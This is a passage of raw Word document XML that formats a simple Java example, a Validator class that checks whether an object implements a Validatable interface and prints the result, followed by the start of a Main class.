          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C00FE1"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Constructor, Getters, Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E1044"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32DF43"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CABF006"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Validator class that checks if an object is validatable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23D220"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validator</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840D516"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> validate</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3BA76C"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">obj </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Validatable</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92D2F2"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"This object is validatable."</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3594A"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7561BE"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"This object is NOT validatable."</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533AB83"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47933D"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E84C0C"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA4DBC"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E451C49"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Main</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AE114"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89224"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1ADF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
